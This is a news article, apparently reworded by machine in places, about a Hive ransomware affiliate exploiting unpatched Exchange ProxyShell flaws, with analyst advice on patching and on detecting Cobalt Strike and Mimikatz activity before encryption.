As part of coordinated attacks, the Hive threat group has targeted organizations across the finance, energy, and healthcare sectors.
During the attacks, the group exploits ProxyShell vulnerabilities inservers to remotely execute arbitrary commands and encrypt the data of companies with the unique hive ransomware strain.
The company is well-organized, with the research team recently discovering that a threat actor managed to enter an organization's environment and encrypted the target data with the ransomware burden in less than 72 hours.
These attacks are particularly wreaking, as unpatched exchange servers are publicly identified via web crawlers. Anyone with an unpatched exchange server is at danger, said Gartner Analyst Peter Firstbrook.
Even organizations that have migrated to the cloud version of Exchange often still have some Exchange servers that would be exploited if unpatched. There are already circulating threats and unpatched servers can be identified with a web crawler, which is extremely likely that unpatched servers will be exploited, said Firstbrook.
What level of risk does ProxyShell have?
Despite the impact of these vulnerabilities, many organizations have failed to patch their on-premise Exchange servers (these vulnerabilities do not affect Exchange online or Office 365 servers).
Last year, 30,000 Exchange Servers were unpatched, and recent attacks reveal that many organizations have been slow to update their systems.
This is particularly problematic given that the vulnerabilities enable an attacker to remotely execute arbitrary commands and malicious code on the Microsoft Exchange server via the 443 port.
"Attackers continue to exploit the ProxyShell vulnerabilities that were initially disclosed more than eight months ago. They have been a reliable resource for attackers since their disclosure, despite patches being available," said a senior research engineer at Tenable.
The latest attacks by an affiliate of the Hive ransomware group have been aided by Microsoft Exchange's ubiquity and apparent delay in patching these months-old difficulties. Organizations around the world in varied industries utilize Microsoft Exchange for critical business functions, making it an ideal target for threats.
Tills claims that Organizations that fail to patch their exchange servers permit attackers to reduce the amount of reconnaissance and immediate steps they must take to infiltrate target systems.
ProxyShell intrusions are detected.
Organizations that are slow to patch, such as smaller, unseasoned or unstaffed IT organizations, may fall into the trap of thinking, just because there are no obvious signs of intrusion that no one uses ProxyShell to gain a foothold in the environment, but this isn't always the case.
While "ransomware attacks will be obvious to organizations when they happen, but there are a number of other attack techniques that will [be] much stealthier, therefore the absence of ransomware does not mean the Exchange server isn't already compromised," according to Firstbrook.
For this reason, Brian Donohue, the principal Information Security Specialist at Managed Detection and Response (MDR) advises that organizations ensure they have the ability to detect the execution Cobalt Strike or Mimikatz, even if they can't update Exchange.
Having a wide defense in depth against a wide range of threats means that even if you cannot patch your Exchange servers or the opponent is using entirely new tradecraft in certain sections of the attack, you might still catch the Mimikatz activity, or you might have an alert that looks for the heavily obfuscated PowerShell that is being used by Cobalt Strike, all of which happens before everything gets encrypted, Donohue said.
Businesses that haven't patched the vulnerabilities can still protect themselves by using Managed Detection and Response as well as other security solutions to detect malicious activity that comes before ransomware encryption, so they may respond before it's too late.
